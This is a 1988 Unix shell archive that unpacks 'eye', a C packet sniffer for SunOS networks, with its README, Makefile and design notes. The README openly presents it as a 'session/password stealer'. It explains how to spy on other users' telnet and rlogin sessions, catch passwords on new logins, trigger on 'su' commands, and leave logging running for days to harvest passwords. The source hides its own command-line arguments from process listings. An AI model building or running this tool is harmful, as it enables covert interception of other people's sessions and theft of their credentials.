#! /bin/sh
# This is a shell archive, meaning:
# 1. Remove everything above the #! /bin/sh line.
# 2. Save the resulting text in a file.
# 3. Execute the file with /bin/sh (not csh) to create:
#	eye.old
# This archive created: Tue Apr  5 11:07:43 1988
export PATH; PATH=/bin:/usr/bin:$PATH
if test ! -d 'eye.old'
then
	echo shar: "creating directory 'eye.old'"
	mkdir 'eye.old'
fi
echo shar: "entering directory 'eye.old'"
cd 'eye.old'
echo shar: "extracting 'defs.h'" '(370 characters)'
if test -f 'defs.h'
then
	echo shar: "will not over-write existing file 'defs.h'"
else
sed 's/^	X//' << \SHAR_EOF > 'defs.h'
	X/*
	X * defs.h -- header file for eye
	X */
	X
	X/*
	X * include files common to both source files of program
	X */
	X
	X# include	<sys/time.h>
	X# include	<sys/types.h>
	X# include	<sys/socket.h>
	X# include	<netdb.h>
	X# include	<stdio.h>
	X
	X/*
	X * external variables
	X */
	X
	Xextern char	*progname,
	X		device[];
	X
	Xextern unsigned short	dest_port,
	X			src_port;
	X
	Xextern unsigned int	ip_src,
	X			ip_dst;
SHAR_EOF
if test 370 -ne "`wc -c < 'defs.h'`"
then
	echo shar: "error transmitting 'defs.h'" '(should have been 370 characters)'
fi
fi
echo shar: "extracting 'README'" '(1548 characters)'
if test -f 'README'
then
	echo shar: "will not over-write existing file 'README'"
else
sed 's/^	X//' << \SHAR_EOF > 'README'
	XThis is a copy of the one and only session/password stealer.  It is
	X used in two ways...
	X
	XStealing sessions:
	X
	X	Use etherfind to choose a ethernet connection you wish to
	X	watch.
	X
	X	# etherfind -ip
	X	.
	X	.
	X.	.
	X 	106  tcp          merlin             Bay     telnet      32284
	X   	60   tcp             Bay          merlin      32284     telnet
	X	.
	X	.
	X	.
	X
	X	Then, use eye to watch the conversation...
	X
	X	# eye telnet@merlin 32284@Bay [ie1]
	X	The 5'th argument is optional. It tells what interface to use.
	X
	XStealing passwords:
	X
	X	# etherfind -t [ie1]
	X
	X	This waits for a new connection and then watches it.
	X
	XStealing su:
	X
	X	While the program is waiting for new connections, it is
	X	also watching for people typing 'su' on the network.  Currently
	X	it will trigger if a person types any one of the following
	X	patterns
	X
	X	% su<RETURN>
	X	% su;
	X	% su<SPACE>
	X
	X	It will also trigger on 
	X
	X	% susu<RETURN>
	X
	X	It only looks at the end of the pattern.
	X
	X
	XCommands to use while using eye...
	X
	X	h - Hold on current connection.
	X	    When connected to a new connection, the system will
	X	    automaticly reset after 25 seconds.  The 'h' will
	X	    suspend the reset.
	X
	X	r - Reset trigger waiting for new conenction.
	X
	X	t - Reset transcript files, creating if needed.
	X
	XSpecical files:
	X
	X	script.s1 and script.s2 - If these files exist, the
	X	program will log everything happining into these files.  Nice
	X	for letting the password stealing run and then leaving it
	X 	for a few days and coming back later for the passwords.
	X
	X		Have fun
	X
	X			--Josh
	X
	XP.S. Oh.. by the way, I am not responsable :-)
SHAR_EOF
if test 1548 -ne "`wc -c < 'README'`"
then
	echo shar: "error transmitting 'README'" '(should have been 1548 characters)'
fi
fi
echo shar: "extracting 'main.c'" '(4474 characters)'
if test -f 'main.c'
then
	echo shar: "will not over-write existing file 'main.c'"
else
sed 's/^	X//' << \SHAR_EOF > 'main.c'
	X#ifndef lint
	Xstatic char    *RCSid = "$Header: main.c,v 1.2 87/06/24 12:15:57 josh Locked $";
	X#endif
	X/*
	X * ------------------------------------------------------------------
	X * Copyright 1987, Josh Siegel 
	X *
	X * Josh Siegel (siegel@hc.dspo.gov) Dept of Electrical and Computer Engineering,
	X * University of New Mexico, Albuquerque , New Mexico (505) 277-2497 
	X *
	X * ------------------------------------------------------------------ 
	X *
	X * $Source: /usr/pcb/josh/other/sys/eye/RCS/main.c,v $ $Revision: 1.2 $ $Date:
	X * 87/05/25 13:40:21 $ $State: Exp $ $Author: josh $ $Locker: josh $ 
	X *
	X * ------------------------------------------------------------------ 
	X *
	X * $Log:	main.c,v $
	X * Revision 1.2  87/06/24  12:15:57  josh
	X * Added ifdefs...
	X * 
	X * Revision 1.1  87/06/24  12:04:06  josh
	X * Initial revision
	X *  Revision 1.1  87/05/25  13:40:21  root Initial revision 
	X *
	X *
	X * ------------------------------------------------------------------ 
	X */
	X/*
	X * eye -- watch a particular TCP/IP session on the Ethernet. 
	X *
	X * usage: eye src_port@src_machine dst_port@dst_machine [device] 
	X *
	X * Written by: Josh Siegel Modified by: Andrew Large (Thu May 14, 1987) BUGS
	X * FIXED Modified by: Josh Siegel (Sat May 23, 1987) Added windows 
	X *
	X */
	X
	X# include	<ctype.h>
	X# include	<curses.h>
	X# include <signal.h>
	X# include <fcntl.h>
	X# include	"defs.h"
	X
	Xchar           *progname,			 /* name of the program */
	X               device[15] ;			 /* Ethernet interface device */
	X
	Xunsigned short  dest_port,			 /* port on destination
	X						  * machine */
	X                src_port;			 /* port on source machine */
	X
	Xunsigned int    ip_src,				 /* source machine */
	X                ip_dst;				 /* destination machine */
	X
	X#ifdef FACIST
	Xint             trigger,sustate;
	X#endif FACIST
	X
	X
	X/*
	X * main -- do initial checking and parsing and then call the packet-scanning
	X * routine. 
	X */
	Xmain (argc, argv)
	X    int             argc;
	X    char           *argv[];
	X{
	X    extern int      qcmd (), exiter();
	X    int i,j;
	X    if (getuid () != 0)
	X    {
	X	fprintf (stderr, "\007No way Bud!  ");
	X	fprintf (stderr, "You have to be root to run this one!\n");
	X	exit (1);
	X    }
	X
	X#ifdef FACIST
	X    trigger = 0;
	X    sustate=0;
	X#endif FACIST
	X
	X    strcpy(device,"ie0");
	X    progname = argv[0];
	X    dest_port = 0;
	X    src_port = 0;
	X
	X    if (argc > 4)
	X	usage ();
	X
	X#ifdef FACIST
	X    if (!strcmp ("-t", argv[1]))
	X    {
	X
	X	trigger = 1;
	X	if (argc == 3)
	X	    strcpy(device,argv[2]);
	X    }
	X    else
	X    {
	X#endif FACIST
	X	parse (argv[1], &src_port, &ip_src);
	X	parse (argv[2], &dest_port, &ip_dst);
	X
	X	if (argc == 4)
	X	    strcpy(device,argv[3]);
	X#ifdef FACIST
	X    }
	X#endif FACIST
	X
	X    wininit ();
	X    cbreak ();
	X    noecho();
	X    fcntl (0, F_SETFL, FASYNC);
	X    signal (SIGIO, qcmd);
	X    signal (SIGHUP,exiter);
	X    signal (SIGINT,exiter);
	X    signal (SIGQUIT,exiter);
	X
	X#ifdef FACIST
	X	/* This little piece of code clears the arguments from the stack
	X	   so that they don't show up in a 'w' */
	X#endif FACIST
	X
	X#ifdef FACIST
	X    for(i=0;i<argc;i++) {
	X	int q;
	X
	X	j=strlen(argv[i]);
	X	for(q=0;q<j;q++) 
	X		argv[i][q]=0;
	X	}
	X
	X
	X#endif FACIST
	X    refresh ();
	X    scan_packets ();
	X    exiter ();
	X}
	X
	Xint exiter ()
	X{
	X    endwin ();
	X    exit(0);
	X}
	X
	X
	X/*
	X * parse -- parse input string into machine and port number, using '@' as
	X * delimiting character 
	X */
	Xparse (string, port, machine)
	X    char            string[];
	Xunsigned short *port;
	Xunsigned int   *machine;
	X{
	X    char           *machine_name;
	X    struct hostent *host_entry,
	X                   *gethostbyname ();
	X    struct servent *server,
	X                   *getservbyname ();
	X    /*
	X     * get machine address 
	X     */
	X    if ((machine_name = (char *) index (string, '@')) == NULL)
	X	usage ();
	X    *machine_name++ = 0;
	X
	X    if ((host_entry = gethostbyname (machine_name)) == 0)
	X    {
	X	fprintf (stderr, "Machine %s is unknown!\n", machine_name);
	X	exit (1);
	X    }
	X    *machine = *(unsigned int *) host_entry->h_addr;
	X
	X
	X    /*
	X     * get port number (kludge) 
	X     */
	X    if (isalpha (string[0]))
	X    {
	X	server = getservbyname (string, "tcp");
	X	if (server == 0)
	X	{
	X	    fprintf (stderr, "No service called %s\n", string);
	X	    exit (1);
	X	}
	X	*port = server->s_port;
	X    }
	X    else
	X	*port = atoi (string);
	X}
	X
	X
	X/*
	X * usage -- print out a usage error line and exit with a value of 1 
	X */
	Xusage ()
	X{
	X    fprintf (stderr,
	X       "Usage: %s src_port@machine dest_port@machine [device]\n", progname);
	X#ifdef FACIST
	X    fprintf (stderr, "Usage: %s -t [device]\n", progname);
	X#endif FACIST
	X    exit (1);
	X}
SHAR_EOF
if test 4474 -ne "`wc -c < 'main.c'`"
then
	echo shar: "error transmitting 'main.c'" '(should have been 4474 characters)'
fi
fi
echo shar: "extracting 'windows.c'" '(1640 characters)'
if test -f 'windows.c'
then
	echo shar: "will not over-write existing file 'windows.c'"
else
sed 's/^	X//' << \SHAR_EOF > 'windows.c'
	X#include <curses.h>
	X#include <ctype.h>
	X
	XWINDOW         *win1,
	X               *win2;
	X
	XWINDOW         *wininit ()
	X{
	X    if              (initscr () == ERR)
	X    {
	X	                printf ("Cannot start up the screen\n");
	X	exit (-1);
	X    }
	X    win1 = newwin (LINES / 2, 0, 0, 0);
	X    win2 = newwin (LINES / 2, 0, LINES / 2, 0);
	X    if (win1 == NULL || win2 == NULL)
	X    {
	X	printf ("Cannot create windows\n");
	X	exit (-1);
	X    }
	X    move((LINES>>1)-1,0);
	X    addstr("------------------------------------------------------------------------------");
	X}
	Xwinout (win, buff, cnt)
	X    int             win,
	X                    cnt;
	X    char           *buff;
	X{
	X    WINDOW         *out;
	X    char            buf[255];
	X    int             i,
	X                    y,
	X                    x;
	X    if (win)
	X	out = win2;
	X    else
	X	out = win1;
	X
	X    for (i = 0; i < cnt; i++)
	X    {
	X
	X	if (win)
	X	{
	X	    if (buff[i] != '\r')
	X		mwaddch (out, buff[i]);
	X	}
	X	else
	X	{
	X	    if (buff[i] != '\r')
	X		mwaddch (out, buff[i]);
	X	    else
	X		mwaddch (out, '\n');
	X	}
	X    }
	X
	X
	X    wrefresh (out);
	X}
	Xmwaddch (dest, chr)
	X    WINDOW         *dest;
	X    char            chr;
	X{
	X    int             x,
	X                    y;
	X    char            c;
	X
	X    if(!chr) return;
	X
	X    if (isprint(chr))
	X	waddch (dest, chr);
	X    else if (chr != '\n' && chr != '\t')
	X    {
	X	c = chr+'A'-1;
	X	waddch (dest, '^');
	X	waddch (dest, c);
	X	return;
	X    }  else
	X    waddch (dest, chr);
	X
	X    if (chr == '\n')
	X    {
	X	getyx (dest, y, x);
	X	if(y < (LINES>>1)-2) {
	X		wmove (dest, y + 1, 0);
	X		wclrtoeol (dest);
	X	}
	X	if (y > (LINES >> 1) - 2)
	X	    wmove (dest, 0, x);
	X	else
	X	    wmove (dest, y, 0);
	X	wclrtoeol (dest);
	X    }
	X}
SHAR_EOF
if test 1640 -ne "`wc -c < 'windows.c'`"
then
	echo shar: "error transmitting 'windows.c'" '(should have been 1640 characters)'
fi
fi
echo shar: "extracting 'tools.c'" '(12627 characters)'
if test -f 'tools.c'
then
	echo shar: "will not over-write existing file 'tools.c'"
else
sed 's/^	X//' << \SHAR_EOF > 'tools.c'
	X#ifndef lint
	Xstatic char    *RCSid = "$Header: tools.c,v 1.2 87/06/24 12:17:25 josh Locked $";
	X#endif
	X/*
	X * ------------------------------------------------------------------
	X * Copyright 1987, Josh Siegel 
	X *
	X * Josh Siegel (siegel@hc.dspo.gov) Dept of Electrical and Computer Engineering,
	X * University of New Mexico, Albuquerque , New Mexico (505) 277-2497 
	X *
	X * ------------------------------------------------------------------ 
	X *
	X * $Source: /usr/pcb/josh/other/sys/eye/RCS/tools.c,v $ $Revision: 1.2 $ $Date:
	X * 87/05/25 13:40:27 $ $State: Exp $ $Author: josh $ $Locker: josh $ 
	X *
	X * ------------------------------------------------------------------ 
	X *
	X * $Log:	tools.c,v $
	X * Revision 1.2  87/06/24  12:17:25  josh
	X * *** empty log message ***
	X * 
	X * Revision 1.1  87/06/24  12:04:18  josh
	X * Initial revision
	X *  Revision 1.1  87/05/25  13:40:27  root Initial revision 
	X *
	X *
	X * ------------------------------------------------------------------ 
	X *
	X * Thanks go to jhc@Sun.COM for the helpful main loop.  The documentation WAS
	X * REAL BAD! 
	X *
	X * Sun.COM!jhc Fri Mar 27 19:48:15 1987 
	X *
	X * Also, read my comments about my feelings on the use of structures. do a
	X * lint(1) on this code to get a general idea of the nastiness and the
	X * unportability of the code in its current state. 
	X *
	X * --josh siegel 
	X *
	X * Written by: Josh Siegel 
	X *
	X * Modified by: Andrew Large (Thu May 14, MDT 1987) (Fixed bugs) 
	X * 
	X * Modified by: Josh Siegel (Added windows and trigger) 
	X *
	X * Modified by: Josh Siegel (Tue Jun 16, 1987) (Added 'su' catcher,
	X * transcript reseter, printout of source and destination, and special
	X * keyboard commands )
	X */
	X
	X# include	"defs.h"
	X# include	<sys/ioctl.h>
	X# include	<net/nit.h>
	X# include	<net/if.h>
	X# include	<netinet/in.h>
	X# include	<netinet/in_systm.h>
	X# include	<netinet/if_ether.h>
	X# include	<netinet/ip.h>
	X# include	<netinet/tcp.h>
	X#include <sys/file.h>
	X#include <signal.h>
	X#include <string.h>
	X
	X
	X# define	BUFSPACE	4 * 8192
	X# define	CHUNKSIZE	2048
	X# define	SNAPLEN		54		 /* Ethernet + ip + tcp */
	X
	Xint             outf1,
	X                outf2;
	X
	X#ifdef FACIST
	Xextern int      trigger,
	X                sustate;
	Xsetter ()
	X{
	X    if (trigger == 0)
	X    {
	X	trigger = 1;
	X
	X	winout (0, "\n<RESET>\n", 9);
	X	winout (1, "\n<RESET>\n", 9);
	X
	X	if (outf1 > 0)
	X	    write (outf1, "\n<RESET>\n", 9);
	X
	X	if (outf2 > 0)
	X	    write (outf2, "\n<RESET>\n", 9);
	X    }
	X}
	X#endif FACIST
	Xscan_packets ()
	X{
	X    register unsigned char *bp,
	X                   *bufstop;
	X    int             datalen;
	X
	X    struct nit_hdr *nh;
	X    struct sockaddr_nit snit;
	X    struct ether_header *eth;
	X    struct nit_ioc  nioc;
	X
	X    unsigned char   buf[BUFSPACE];
	X    int             socket_fd,
	X                    num_bytes;
	X#ifdef FACIST
	X    signal (SIGALRM, setter);
	X#endif FACIST
	X
	X    socket_fd = socket (AF_NIT, SOCK_RAW, NITPROTO_RAW);
	X
	X    outf2 = open ("script.s1", O_WRONLY | O_APPEND);
	X    outf1 = open ("script.s2", O_WRONLY | O_APPEND);
	X
	X    if (socket_fd < 0)
	X    {
	X	perror ("socket");
	X	exit (1);
	X    }
	X    snit.snit_family = AF_NIT;
	X    (void) strncpy (snit.snit_ifname, device, NITIFSIZ);
	X    if (bind (socket_fd, (struct sockaddr *) & snit, sizeof (snit)) < 0)
	X    {
	X	perror (device);
	X	exit (1);
	X    }
	X    bzero ((char *) &nioc, sizeof (nioc));
	X    nioc.nioc_bufspace = BUFSPACE;
	X    nioc.nioc_chunksize = CHUNKSIZE;
	X    nioc.nioc_typetomatch = 0x800;
	X    nioc.nioc_snaplen = SNAPLEN;
	X    nioc.nioc_bufalign = sizeof (int);
	X    nioc.nioc_bufoffset = 0;
	X    nioc.nioc_flags = NF_PROMISC | NF_TIMEOUT;
	X    nioc.nioc_timeout.tv_sec = 1;
	X    nioc.nioc_timeout.tv_usec = 0;
	X
	X    if (ioctl (socket_fd, SIOCSNIT, &nioc) < 0)
	X    {
	X	perror ("ioctl");
	X	exit (1);
	X    }
	X    while ((num_bytes = read (socket_fd, (char *) buf, sizeof (buf))) > 0)
	X    {
	X	bufstop = buf + num_bytes;
	X	/*
	X	 * The following line of code was supplied by Sun... I take no
	X	 * credit!  I will tell you what it does.... 
	X	 *
	X	 * It sets bp to be bp + the size of the pack rounded up to the nearest
	X	 * word 
	X	 */
	X
	X	for (bp = buf; bp < bufstop;
	X	     bp += ((sizeof (struct nit_hdr) + datalen +
	X		     sizeof (int) - 1) & ~(sizeof (int) - 1)))
	X	{
	X
	X	    nh = (struct nit_hdr *) bp;
	X	    eth = (struct ether_header *) & bp[sizeof
	X					       (struct nit_hdr)];
	X
	X	    switch (nh->nh_state)
	X	    {
	X	      case NIT_CATCH:
	X		datalen = nh->nh_datalen;
	X		filter_packet (eth);
	X		break;
	X	      default:
	X		datalen = 0;
	X		break;
	X	    }
	X	}
	X    }
	X
	X    printf ("Ack! Ack! Something's wrong!\n");
	X    exit (1);
	X}
	X
	X
	X/*
	X * filter_packet: prints the data contained withen the packet if the packet
	X * is one of the ones we are watching for. 
	X *
	X * The stupidity of this routine is that I allowed myself the luxury of using
	X * strutures instead of brute force going into the data as if it were
	X * characters like I do in my length calculation.  In order to make this
	X * routine more portable,  all use of sizeof() needs to be removed.  luckily,
	X * since this only works on a Sun now,  the sizeof() calls are safe. 
	X *
	X */
	Xqcmd ()
	X{
	X    char            buff[1];
	X    read (0, buff, 1);
	X
	X    switch (buff[0])
	X    {
	X#ifdef FACIST
	X      case 'h':
	X	sustate = 0;
	X	trigger = -1;
	X	break;
	X      case 'r':
	X	sustate = 0;
	X	trigger = 0;
	X	setter ();
	X	break;
	X#endif FACIST
	X      case 't':
	X	close (outf1);
	X	close (outf2);
	X	outf2 = open ("script.s1", O_WRONLY | O_CREAT | O_TRUNC);
	X	outf1 = open ("script.s2", O_WRONLY | O_CREAT | O_TRUNC);
	X	winout (0, "\n<New transcript>\n", 18);
	X	winout (1, "\n<New transcript>\n", 18);
	X	break;
	X
	X    }
	X}
	Xfilter_packet (eth)
	X    struct ether_header *eth;
	X{
	X    char           *buff,
	X                   *data_pos;
	X    int             data_len;
	X
	X    struct ip      *ip;
	X    struct tcphdr  *tcp;
	X    /*
	X     * skip past ethernet header to get to IP header 
	X     */
	X
	X    ip = (struct ip *) ((int) eth + sizeof (struct ether_header));
	X    /*
	X     * Check to make sure protocol of packet is TCP and that the source and
	X     * destination addresses are correct 
	X     */
	X    if (ip->ip_p != 6)
	X	return;
	X    /*
	X     * skip past Ethernet and IP headers to get to TCP header 
	X     */
	X    tcp = (struct tcphdr *) ((int) ip + sizeof (struct ip));
	X
	X#ifdef FACIST
	X    if (trigger == 1)
	X    {
	X	if ((tcp->th_flags & TH_SYN) || sucheck ((char *) ip))
	X	{
	X	    char            macname[80],
	X	                    macname2[80];
	X	    struct hostent *hoser,
	X	                   *hoser2;
	X	    sustate = 0;
	X	    ip_dst = (unsigned int) (ip->ip_src.s_addr);
	X	    ip_src = (unsigned int) (ip->ip_dst.s_addr);
	X	    src_port = tcp->th_dport;
	X	    dest_port = tcp->th_sport;
	X
	X	    if ((src_port != 21 && src_port != 23 && src_port != 513) &&
	X		(dest_port != 21 && dest_port != 23 && dest_port != 513))
	X		return;
	X
	X
	X	    trigger = 0;
	X	    hoser = gethostbyaddr (&ip_dst, sizeof (ip_dst), AF_INET);
	X	    strcpy (macname2, hoser->h_name);
	X	    hoser2 = gethostbyaddr (&ip_src, sizeof (ip_src), AF_INET);
	X	    sprintf (macname, "\n<%s - %s>\n", macname2, hoser2->h_name);
	X	    write (outf1, macname, strlen (macname));
	X	    write (outf2, macname, strlen (macname));
	X	    winout (0, macname, strlen (macname));
	X	    winout (1, macname, strlen (macname));
	X	    alarm (25);
	X	}
	X	return;
	X    }
	X    else
	X    {
	X
	X#endif FACIST
	X	if (ip_src != (unsigned int) (ip->ip_src.s_addr) ||
	X	    ip_dst != (unsigned int) (ip->ip_dst.s_addr))
	X	    if (ip_dst != (unsigned int) (ip->ip_src.s_addr) ||
	X		ip_src != (unsigned int) (ip->ip_dst.s_addr))
	X		return;
	X	/*
	X	 * The following lines of nastiness were taken from the portable
	X	 * checksum routine we wrote.  It was designed to be used in an
	X	 * environment where there are NO headers and the compilers produced
	X	 * inconsistent structures. 
	X	 *
	X	 * The end result of the command is that ``data_len'' gets the length of
	X	 * the data portion of the tcp packet no matter WHAT the extra data
	X	 * fields in the packet look like. 
	X	 */
	X
	X	if (tcp->th_sport == src_port && tcp->th_dport == dest_port)
	X	{
	X	    if (tcp->th_flags & TH_FIN)
	X	    {
	X#ifndef FACIST
	X		winout (1, "\n<CLOSED>\n", 10);
	X#else FACIST
	X		winout (1, "\n<RESET>\n", 9);
	X		trigger = 1;
	X#endif FACIST
	X		return;
	X	    }
	X	    buff = (char *) ip;
	X	    data_len = ntohs (*((short *) (buff + 2))) - (buff[0] & 0x0f) *
	X		4 - ((buff[(buff[0] & 0x0f) * 4 + 12] & 0xf0) >> 4) * 4;
	X
	X	    if (data_len != 0)
	X	    {
	X		data_pos = &buff[*((short *) (buff + 2)) - data_len];
	X		if (outf1 > 0)
	X		    write (outf1, data_pos, data_len);
	X		winout (1, data_pos, data_len);
	X	    }
	X	}
	X	else if (tcp->th_sport == dest_port && tcp->th_dport == src_port)
	X	{
	X	    if (tcp->th_flags & TH_FIN)
	X	    {
	X#ifndef FACIST
	X		winout (0, "\n<CLOSED>\n", 10);
	X#else FACIST
	X		winout (0, "\n<RESET>\n", 9);
	X		trigger = 1;
	X#endif FACIST
	X		return;
	X	    }
	X	    buff = (char *) ip;
	X	    data_len = ntohs (*((short *) (buff + 2))) - (buff[0] & 0x0f) *
	X		4 - ((buff[(buff[0] & 0x0f) * 4 + 12] & 0xf0) >> 4) * 4;
	X
	X	    if (data_len != 0)
	X	    {
	X		data_pos = &buff[*((short *) (buff + 2)) - data_len];
	X		if (outf2 > 0)
	X		    write (outf2, data_pos, data_len);
	X		winout (0, data_pos, data_len);
	X	    }
	X	}
	X#ifdef FACIST
	X    }
	X}
	X/*
	X * 'su' checking code- This code was written as the second to final attack on
	X * networking. This allows specific searches for people typing the string
	X * '\nsu\n' somewhere on the network. 
	X *
	X * Once again we use the magic set of commands written by bret and myself to
	X * calculate the position of the data in the tcp/ip packet.  Here I avoid
	X * using structures as best as possible. It makes it hard to read but easier
	X * to port to another machine once upon a time. 
	X */
	X
	Xsucheck (buff)
	X    register char  *buff;
	X{
	X    int             data_len,
	X                    dest_port,
	X                    ret;
	X    char           *data_pos,
	X                   *p;
	X    struct ip      *ip;
	X    struct tcphdr  *tcp;
	X    ret = 0;
	X    /*
	X     * Lets have a tcp pointer to play with.  I use 'sizeof()' here just
	X     * cause I can't find my reference on ip.  Again, since it currently only
	X     * works on a Sun, it doesn't matter how portable I am  
	X     */
	X
	X    tcp = (struct tcphdr *) ((int) buff + sizeof (struct ip));
	X    ip = (struct ip *) buff;
	X    /*
	X     * Here is a bit of nastyness... 
	X     *
	X     * In a rlogin or telnet,  the destination is the port numbers for rlogin or
	X     * telnet.  This means that the source is where the user is 
	X     */
	X
	X
	X    if ((tcp->th_dport != 23 && tcp->th_dport != 513))
	X	return (0);
	X
	X    /* Find the length and the position of the data */
	X
	X    data_len = ntohs (*((short *) (buff + 2))) - (buff[0] & 0x0f) * 4 - ((buff[(buff[0] & 0x0f) * 4 + 12] & 0xf0) >> 2);
	X    data_pos = &buff[*((short *) (buff + 2)) - data_len];
	X
	X    if (data_len == 0)				 /* no data?  Nothing we are
	X						  * interested in then */
	X	return (0);
	X    /*
	X     * We know know the following information.. 
	X     *
	X     * (1) It is TCP 
	X     *
	X     * (2) It is a telnet/rlogin connection from the user to the machine. 
	X     *
	X     * (3) It has data! 
	X     *
	X     * Now... I have several choices of where to go from here.  I can lock into
	X     * any connection where a person types a 's' and wait for them to type a
	X     * 'u\n' or I can try to pay attention to many different conversations at
	X     * once.  I choose the first because it is faster and easier to write. 
	X     */
	X
	X    /* First we make the string NULL terminating */
	X
	X    data_pos[data_len] = 0;
	X
	X    if (sustate)
	X    {
	X	/* Lets make sure we are looking at the right data */
	X	if ((ip_dst != (unsigned int) (ip->ip_dst.s_addr)) ||
	X	    (ip_src != (unsigned int) (ip->ip_src.s_addr)) ||
	X	    (src_port != tcp->th_sport) ||
	X	    (dest_port != tcp->th_dport))
	X	    return (0);
	X
	X	p = data_pos;
	X	while (*p && suchar (*p++, &ret));
	X    }
	X    else
	X    {
	X	p = (char *) index (data_pos, 's');
	X	if (p != NULL)
	X	{
	X	    ip_dst = (unsigned int) (ip->ip_dst.s_addr);
	X	    ip_src = (unsigned int) (ip->ip_src.s_addr);
	X	    src_port = tcp->th_sport;
	X	    dest_port = tcp->th_dport;
	X
	X	    while (*p && suchar (*p++, &ret));
	X	}
	X    }
	X    return (ret);
	X}
	Xsuchar (c, ret)
	X    char            c;
	X    int            *ret;
	X{
	X
	X    switch (sustate)
	X    {
	X      case 0:
	X	if (c == 's')
	X	{
	X	    sustate = 1;
	X	    *ret = 0;
	X	}
	X	else
	X	{
	X	    sustate = 0;
	X	    *ret = 0;
	X	    return (0);
	X	}
	X	break;
	X      case 1:
	X	if (c == 'u')
	X	{
	X	    sustate = 2;
	X	    *ret = 0;
	X	}
	X	else
	X	{
	X	    sustate = 0;
	X	    *ret = 0;
	X	    return (0);
	X	}
	X	break;
	X      case 2:
	X	if (c == 13 || c==' ' || c==';')
	X	{
	X	    sustate = 0;
	X	    *ret = 1;
	X	    write (outf1, "su\n", 3);
	X	    write (outf2, "su\n", 3);
	X	    winout (0, "\n<SU>\n", 6);
	X	    winout (1, "\n<SU>\n", 6);
	X	}
	X	else
	X	{
	X	    sustate = 0;
	X	    *ret = 0;
	X	}
	X	return (0);
	X	break;
	X      default:
	X	sustate = 0;
	X	return (0);
	X    }
	X    return (1);
	X#endif FACIST
	X}
SHAR_EOF
if test 12627 -ne "`wc -c < 'tools.c'`"
then
	echo shar: "error transmitting 'tools.c'" '(should have been 12627 characters)'
fi
fi
echo shar: "extracting 'Makefile'" '(1031 characters)'
if test -f 'Makefile'
then
	echo shar: "will not over-write existing file 'Makefile'"
else
sed 's/^	X//' << \SHAR_EOF > 'Makefile'
	X
	XCFLAGS        = -g -DFACIST
	X
	XDEST	      = .
	X
	XEXTHDRS	      = /usr/include/ctype.h 
	X
	XHDRS	      = defs.h
	X
	XLDFLAGS	      =
	X
	XLIBS	      = -lcurses -ltermcap
	X
	XLINKER	      = cc
	X
	XMAKEFILE      = Makefile
	X
	XOBJS	      = main.o \
	X		tools.o \
	X		windows.o
	X
	XPRINT	      = pr
	X
	XPROGRAM	      = eye
	X
	XSRCS	      = main.c \
	X		tools.c \
	X		windows.c
	X
	Xall:		$(PROGRAM)
	X
	X$(PROGRAM):     $(OBJS)
	X		@echo -n "Loading $(PROGRAM) ... "
	X		@$(LINKER) $(LDFLAGS) $(OBJS) $(LIBS) -o $(PROGRAM)
	X		@echo "done"
	X
	Xclean:;		@rm -f $(OBJS)
	X
	Xdepend:;	@mkmf -f $(MAKEFILE) PROGRAM=$(PROGRAM) DEST=$(DEST)
	X
	Xindex:;		@ctags -wx $(HDRS) $(SRCS)
	X
	Xinstall:	$(PROGRAM)
	X		@echo Installing $(PROGRAM) in $(DEST)
	X		@install -s $(PROGRAM) $(DEST)
	X
	Xprint:;		@$(PRINT) $(HDRS) $(SRCS)
	X
	Xshar:;		@rm -f eye.shar
	X		@shar -a $(MAKEFILE) $(HDRS) $(SRCS) > eye.shar
	X
	Xprogram:        $(PROGRAM)
	X
	Xtags:           $(HDRS) $(SRCS); @ctags $(HDRS) $(SRCS)
	X
	Xupdate:		$(DEST)/$(PROGRAM)
	X
	X$(DEST)/$(PROGRAM): $(SRCS) $(LIBS) $(HDRS) $(EXTHDRS)
	X		@make -f $(MAKEFILE) DEST=$(DEST) install
	X###
SHAR_EOF
if test 1031 -ne "`wc -c < 'Makefile'`"
then
	echo shar: "error transmitting 'Makefile'" '(should have been 1031 characters)'
fi
fi
echo shar: "extracting 'design'" '(384 characters)'
if test -f 'design'
then
	echo shar: "will not over-write existing file 'design'"
else
sed 's/^	X//' << \SHAR_EOF > 'design'
	Xascii - save readable trasnscripts of conversations
	Xdest $  - destination for packets
	Xfrom $ - source for packets
	Xinterface $ - interface to work on
	Xload $ - load packets saved in file
	Xname $ - prefix for all files created
	Xports # - trigger on ports 
	Xraw - NO windows.. just print-out the packets as they come
	Xscript $ - log of packets (raw form)
	Xtrigger - trigger on new connections
SHAR_EOF
if test 384 -ne "`wc -c < 'design'`"
then
	echo shar: "error transmitting 'design'" '(should have been 384 characters)'
fi
fi
echo shar: "done with directory 'eye.old'"
cd ..
exit 0
#	End of shell archive



